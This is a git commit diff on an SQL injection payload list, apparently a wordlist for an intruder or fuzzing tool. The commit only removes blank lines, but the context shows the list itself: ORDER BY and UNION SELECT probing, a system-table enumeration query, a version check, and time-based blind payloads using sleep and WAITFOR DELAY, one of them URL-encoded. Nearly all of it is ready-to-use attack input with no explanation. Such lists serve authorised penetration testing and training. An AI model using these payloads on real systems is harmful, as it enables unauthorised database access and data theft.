Update SQL-Injection

2024-11-10 07:04:22 +00:00 · 2020-05-14 15:29:52 +09:00 · 2020-05-14 15:29:52 +09:00 · 4c3cb6f530
commit 4c3cb6f530
parent e95a4aeac0
1 changed files with 0 additions and 20 deletions
--- a/Injection/Intruder/SQL-Injection
+++ b/Injection/Intruder/SQL-Injection
@ -29,11 +29,8 @@
 +		addition, concatenate (or space in url)
 ||		(double pipe) concatenate
 %		wildcard attribute indicator
-
@variable	local variable
@@variable	global variable
-
-
 # Numeric
 AND 1
 AND 0
@ -43,44 +40,27 @@ AND false
 1-true
 1*56
 -2
-
-
 1' ORDER BY 1--+
 1' ORDER BY 2--+
 1' ORDER BY 3--+
-
 1' ORDER BY 1,2--+
 1' ORDER BY 1,2,3--+
-
 1' GROUP BY 1,2,--+
 1' GROUP BY 1,2,3--+
 ' GROUP BY columnnames having 1=1 --
-
-
 -1' UNION SELECT 1,2,3--+
 ' UNION SELECT sum(columnname ) from tablename --
-
-
 -1 UNION SELECT 1 INTO @,@
 -1 UNION SELECT 1 INTO @,@,@
-
 1 AND (SELECT * FROM Users) = 1	
-
 ' AND MID(VERSION(),1,1) = '5';
-
 ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
-
-
 Finding the table name
-
-
 Time-Based:
 ,(select * from (select(sleep(10)))a)
 %2c(select%20*%20from%20(select(sleep(10)))a)
 ';WAITFOR DELAY '0:0:30'--
-
 Comments:
-
 #	    Hash comment
 /*  	C-style comment
 -- -	SQL comment